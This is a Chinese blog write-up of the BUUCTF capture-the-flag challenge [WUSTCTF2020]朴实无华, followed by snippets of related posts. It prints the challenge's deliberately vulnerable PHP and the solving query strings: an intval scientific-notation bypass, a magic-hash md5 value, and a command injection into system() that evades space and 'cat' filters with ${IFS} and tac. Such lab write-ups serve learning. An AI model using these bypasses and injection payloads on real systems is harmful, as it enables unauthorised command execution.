buuctf-[WUSTCTF2020]朴实无华

最新推荐文章于 2024-02-03 00:21:23 发布
最新推荐文章于 2024-02-03 00:21:23 发布
阅读量312 收藏 1
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/133034292
版权

打开环境就这么一句话

先打开index.php,但是没有什么

 

查看了下网络

看到gzip和php

我试了试www.zip

还有index.phps,也是一样的,都没找到文件

于是我想到用御剑扫,但是我好像线程太长了,一个没扫到,我就想到用dirsearch

扫到robots.txt了

访问

再访问,得到一个假的flag

想到用bp抓包了

Look_at_me: /fl4g.php 

访问一下,发现都是乱码

搜索了一下火狐浏览器页面乱码怎么办

参考如何修复火狐浏览器的乱码问题(最新版)_火狐浏览器乱码_小宇特详解的博客-CSDN博客

找到修复文字编码

修复后正常了,这题怎么这么繁杂

 

从level1开始研究

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");

php真的忘得差不多了

先去搜了搜这个函数

这个函数可以通过科学计数法来绕过

1e10 会被识别为1但是

1e10+1后就会恢复原本 

所以传入

?num=1e10

绕过成功

 

再看level2

//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

 ==是弱类型比较,上网搜了下

https://www.cnblogs.com/dre0m1/p/16062369.html

所以传入md5=0e215962017

成功绕过

再看level3

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

先看看函数

过滤了空格和cat,这里用的${IFS}。

查看一下目录

?num=1e10&md5=0e215962017&get_flag=ls

然后cat用tac,做完感觉确实不难。

?num=1e10&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

 

木…
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[WUSTCTF2020]朴实无华
zxnimud5的专栏
09-12 225
浏览器标题有乱码 编码调成unicode robots.txt : /fAke_f1agggg.php 访问后啥也没有 用burp看 这里必须采用代理拦截 不拦截啥都看不到 burp里右边响应头里有提示,/fl4g.php 然后代码审计 //level1 if(isset($_GET['num'])){ $num=$_GET['num']; if(intval($num)<2020&&intval($num+1)...
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选.doc
BUUCTF 28
qq_52431855的博客
02-22 169
知识点 robots.txt: robots.txt置于网站的跟目录下。爬虫根据此文件决定网站下的哪些页面是被授权抓取的。 intval() 函数 语法:int intval ( mixed $var [, int $base = 10 ] ) 参数: 作用: 28-1[WUSTCTF2020]朴实无华 做题思路 原谅我看见这个毫无头绪,由 WP 得知 根据由bot字眼,想到robots.txt网站的爬虫规则 访问文件robots.txt 继续访问fAke...
[WUSTCTF2020]朴实无华1
whale_waves的博客
12-25 540
这里利用到intval的漏洞,传入科学计数法时只会要e之前的数字,如果传入1e10,intval(1e4)=1,但是intval(1e4+1)=10001,因为这里是科学计数法加算数,所以会先计算了,在取值,所以理论上来说只要e前面的数字小于2000,并且科学计算以后大于2001就能绕过。首先strstr(1,2)会匹配1里2出现的地方以后的剩余的所有字符(空格用/**/替换)跑buuctf的题需要限速显示,不然跑太快了会429报错。这里需要让他原本弱等于md5以后的自己。打开以后,点击ie浏览器的图标。
BUU刷题[WUSTCTF2020]朴实无华
最新发布
Fab1an的博客
02-03 837
比如 2e4 就等于 20000,但是它会被强制转换为int类型,就变成了2,是符合小于2020的,然后它加一的时候,就用的是科学计数法后的结果,变成20000+1=20001,就符合大于2021的条件判断了。写着人家极乐bot,不知道什么意思,先用dirsearch扫一下目录。发现返回包里面有提示,让我们查看一下/fl4g.php。,它需要小于2020,但是加1之后要大于2021。访问一下发现一个假的flag,那么抓包看一下。,传入的值经过md5加密之后需要等于它本身。,并且浏览器的头部是乱码。
BUUCTF(web刷题记录一)
nareku的博客
04-16 8596
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
buuctf-朴实无华
m0_62094846的博客
04-06 298
扫目录也没扫出什么东西 标题上有bot,想到robots.txt(有点牵强) 继续查 然后线索就断了,但是这个页面应该不会没用,抓包看看(之前页面中header information-headers可能也暗示了查看头文件) 然后是一串乱码,可以在火狐浏览器的更多工具里查找修复文字编码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__fil...
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 981
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
BUUCTF-社团考核
qq_60905276的博客
09-24 1037
BUUCTF上面的题
BUUCTF [WUSTCTF2020] 朴实无华
Senimo
12-16 1065
BUUCTF [WUSTCTF2020]朴实无华 考点: intval()函数科学计数法绕过 网页Unicode编码 变量md5()加密后与原值相等 nl、tac等替代cat命令 启动靶机: 根据标签名: <title>人间极乐bot</title> 猜测可能有robots.txt协议,访问: 得到假的flag: 根据之前的Warning: 猜测和请求头有关,使用BurpSuite抓取数据包: 在Response中发现新的提示: Look_at_me: /fl4g.p
note:就是一个朴实无华的笔记本
04-02
对数序列就是一个朴实无华的笔记本
logseq:就是一个朴实无华的笔记本
03-29
对数序列 就是一个朴实无华的笔记本
bemaker:WELL项目建设者
06-09
安装 npm install bemaker项目文件结构Bemaker 对文件结构尽可能朴实无华。 与常规文件一起, 也包含在程序集中。 预计有一个包含块目录的目录,在每个目录中,块文件位于任意层次结构中。 例如: blocks/ button/ ...
创想颖峰学校OA系统 v5.91.zip
07-12
1、界面简洁,朴实无华。各种功能,一览无遗,简单实用。 2、配合OA精灵使用,迅速、及时。使学校内部通知、邮件通行无阻,及时传递。 3、除了基本办公功能,集成学校常见的功能。专业、专注、实用,例如部门文件...
buu-[GYCTF2020]Ezsqli
qaq517384的博客
10-10 376
朴实无华一张图片,一个输入框,图片太大就不放了 1是Nu1L,2是V&N,剩下都是“Error Occured When Fetch Result.” fuzz一下,507的都是被过滤了的 过滤了关键的information, 要用到无列名注入,找库名时需要用到用到5.7版本新增的sys库 利用sys库里的三个表都行 schema_table_statistics/schema_table_statistics_with_buffer /x$schema_flattened_keys 表可以找到
BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
weixin_44632787的博客
10-07 695
启动挑战页面 访问一下robots.txt看看有没有什么提示 发现有个可疑的链接:/fAke_f1agggg.php 到这里就可以看到重要的源码了 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num .
BUUCTF WEB 朴实无华1
qq_41696858的博客
12-21 178
打开场景,一堆乱码,让我们不要看headers,那不用说了,肯定hint在headers里面,burp抓包,当前页面headers没有啥的 那就扫目录吧,扫出来一个robots.txt,进 有一个fAke_flaaaaag.php,很明显是假的,我们再看headers头还是没有啥有用的 访问/fAke_flaaaaag.php,这次抓包发现一个look at me头,终于发现了正确的flag地址:/fl4g.php 什么,这就满足了?naive!访问下来是一堆源码,代码审计 <?php header(
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 451
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值